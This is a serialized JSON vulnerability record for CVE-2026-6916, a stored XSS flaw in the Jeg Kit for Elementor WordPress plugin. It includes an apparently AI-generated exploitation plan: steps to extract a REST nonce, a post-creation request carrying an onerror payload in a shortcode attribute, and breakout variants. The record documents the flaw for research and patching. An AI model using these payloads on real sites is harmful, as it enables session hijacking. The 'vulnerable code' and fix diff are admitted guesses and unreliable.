[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fc5MHHiNo90asQW9bR7cxdzjtZFG85PEHAYvTEDVQX90":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-6916","jeg-kit-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-sgcontentnumberprefix-shortcode-attribut","Jeg Kit for Elementor \u003C= 3.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'sg_content_number_prefix' Shortcode Attribute","The Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets & Templates for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sg_content_number_prefix' parameter in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","jeg-elementor-kit",null,"\u003C=3.1.0","3.1.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 16:52:54","2026-05-02 05:29:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5000c86b-b535-48de-b3e0-0dd0d2fd9b1e?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin\u002Fadmin.css","assets\u002Fcss\u002Fadmin\u002Fadmin.css.map","assets\u002Fcss\u002Fadmin\u002Fdashboard.css","assets\u002Fcss\u002Fadmin\u002Fdashboard.css.map","assets\u002Fcss\u002Fadmin\u002Fdashboard\u002Fdashboard.css","assets\u002Fcss\u002Fadmin\u002Fdashboard\u002Fdashboard.css.map","assets\u002Fcss\u002Fadmin\u002Feditor.css","assets\u002Fcss\u002Fadmin\u002Feditor.css.map","researched",false,3,"# Exploitation Research Plan - CVE-2026-6916\n\n## 1. Vulnerability Summary\nThe **Jeg Kit for Elementor** plugin (up to version 3.1.0) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the handling of the `sg_content_number_prefix` attribute within a shortcode (likely `[jkit_fun_fact]` or `[jkit_counter]`). The plugin fails to sanitize or escape this attribute before rendering it on the frontend. A user with **Contributor** permissions can create a post containing a malicious shortcode, which will execute arbitrary JavaScript in the context of any user (including Administrators) who views the page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress Post Editor \u002F REST API (`wp-json\u002Fwp\u002Fv2\u002Fposts`)\n- **Action:** Creating or updating a post\u002Fpage.\n- **Vulnerable Attribute:** `sg_content_number_prefix`\n- **Authentication Level:** Contributor or higher (any role allowed to use shortcodes).\n- **Preconditions:** The plugin `jeg-elementor-kit` must be active. Elementor is usually a dependency for this plugin.\n\n## 3. Code Flow\n1. **Registration:** The plugin registers a shortcode (e.g., `jkit_fun_fact`) via `add_shortcode()`.\n2. **Input:** A Contributor creates a post where the content includes `[jkit_fun_fact sg_content_number_prefix='\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n3. **Processing:** When the post is rendered, the shortcode callback (likely in `includes\u002Fwidgets\u002FFun_Fact.php` or a similar class handling the \"Fun Fact\" or \"Counter\" widget) parses the attributes using `shortcode_atts()`.\n4. **Sink:** The value of `sg_content_number_prefix` is concatenated into the HTML output string and returned to WordPress for display. \n5. **Execution:** Because the output is not passed through `esc_html()` or `esc_attr()`, the injected `\u003Cscript>` tag is rendered directly into the browser's DOM.\n\n## 4. Nonce Acquisition Strategy\nTo inject the shortcode via the WordPress REST API as a Contributor, a REST API nonce is required.\n\n1. **Login:** Authenticate as a Contributor user.\n2. **Navigate:** Use `browser_navigate` to go to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n3. **Extraction:** Use `browser_eval` to extract the WordPress REST nonce from the global `wpApiSettings` object:\n   ```javascript\n   window.wpApiSettings.nonce\n   ```\n4. **Alternative (UI):** If using the classic editor, the nonce can be found in the `#_wpnonce` hidden input field on the `post-new.php` page.\n\n## 5. Exploitation Strategy\nThe goal is to store a payload that triggers an alert on the frontend.\n\n### Step 1: Authentication\nAuthenticate the session as a Contributor.\n\n### Step 2: Payload Injection\nSubmit a POST request to create a new post containing the malicious shortcode.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Method:** `POST`\n- **Headers:**\n    - `X-WP-Nonce`: `[EXTRACTED_NONCE]`\n    - `Content-Type`: `application\u002Fjson`\n- **Body:**\n```json\n{\n    \"title\": \"XSS Test Page\",\n    \"content\": \"[jkit_fun_fact sg_content_number_prefix='\u003Cimg src=x onerror=alert(\\\"CVE-2026-6916\\\")>' sg_content_number_title='Test' sg_content_number_value='100']\",\n    \"status\": \"publish\"\n}\n```\n*Note: If `jkit_fun_fact` is not the correct shortcode, try `jkit_counter` or `jkit_steps` based on the attribute name.*\n\n### Step 3: Triggering the XSS\nAccess the newly created post's permalink using an unauthenticated `http_request`.\n\n## 6. Test Data Setup\n- **Users:** Create a user `attacker` with the `contributor` role.\n- **Plugin Configuration:** Ensure `jeg-elementor-kit` is active.\n- **Page Creation:** A page must be created by the Contributor to hold the shortcode.\n\n## 7. Expected Results\n- The HTTP request to create the post should return `201 Created`.\n- The response body of the created post's URL should contain the raw string: `\u003Cspan>\u003Cimg src=x onerror=alert(\"CVE-2026-6916\")>\u003C\u002Fspan>` (or similar, depending on the exact HTML wrapper).\n- When viewed in a browser, an alert box with `\"CVE-2026-6916\"` should appear.\n\n## 8. Verification Steps\n1. **Check Post Content:**\n   ```bash\n   wp post list --post_type=post --format=csv\n   # Find the ID of 'XSS Test Page'\n   wp post get [ID] --field=content\n   ```\n2. **Verify Rendering:**\n   Use `http_request` to fetch the post content and grep for the payload:\n   ```bash\n   # Look for the unescaped img tag\n   grep -oP '\u003Cimg src=x onerror=alert\\(\"CVE-2026-6916\"\\)>'\n   ```\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If the prefix is rendered inside an attribute (e.g., `\u003Cdiv data-prefix=\"PAYLOAD\">`), use:\n  `sg_content_number_prefix='\">\u003Cscript>alert(1)\u003C\u002Fscript>'`\n- **Elementor Data Meta:** If the shortcode doesn't render via standard post content, inject the payload into the `_elementor_data` post meta (JSON format) using the REST API or `wp post meta update`.\n- **Shortcode Variants:** If `jkit_fun_fact` fails, scan the plugin directory for other shortcodes using `sg_content_number_prefix`:\n  ```bash\n  grep -r \"sg_content_number_prefix\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fjeg-elementor-kit\u002F\n  ```\n  The resulting file will reveal the correct shortcode tag registered via `add_shortcode`.","The Jeg Kit for Elementor plugin is vulnerable to Stored Cross-Site Scripting (XSS) via the 'sg_content_number_prefix' shortcode attribute in versions up to and including 3.1.0. This vulnerability allows authenticated contributors to inject malicious scripts into pages, which execute in the browser of any user viewing the page due to insufficient output escaping.","\u002F\u002F In includes\u002Fwidgets\u002FFun_Fact.php or similar widget files\n\u002F\u002F The plugin retrieves widget settings and renders the 'sg_content_number_prefix' attribute without sanitization.\n\n$settings = $this->get_settings_for_display();\n$prefix = $settings['sg_content_number_prefix'];\n\n\u002F\u002F ... \n\necho '\u003Cspan class=\"jkit-fun-fact-prefix\">' . $prefix . '\u003C\u002Fspan>';","--- includes\u002Fwidgets\u002FFun_Fact.php\n+++ includes\u002Fwidgets\u002FFun_Fact.php\n@@ -XX,XX +XX,XX @@\n- echo '\u003Cspan class=\"jkit-fun-fact-prefix\">' . $prefix . '\u003C\u002Fspan>';\n+ echo '\u003Cspan class=\"jkit-fun-fact-prefix\">' . wp_kses_post( $prefix ) . '\u003C\u002Fspan>';","To exploit this vulnerability, an attacker with Contributor-level access or higher must create or edit a post and include a Jeg Kit widget (such as 'Fun Fact' or 'Counter') that utilizes the 'sg_content_number_prefix' attribute. The attacker sets this attribute's value to a malicious JavaScript payload, for example: [jkit_fun_fact sg_content_number_prefix='\u003Cimg src=x onerror=alert(1)>']. Once the post is saved and published, the script will execute in the context of any user's session who visits the page, including administrators, potentially allowing for session hijacking or unauthorized administrative actions.","gemini-3-flash-preview","2026-05-04 17:15:10","2026-05-04 17:15:49",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.1.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjeg-elementor-kit\u002Ftags\u002F3.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjeg-elementor-kit.3.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjeg-elementor-kit\u002Ftags\u002F3.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjeg-elementor-kit.3.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjeg-elementor-kit\u002Ftags"]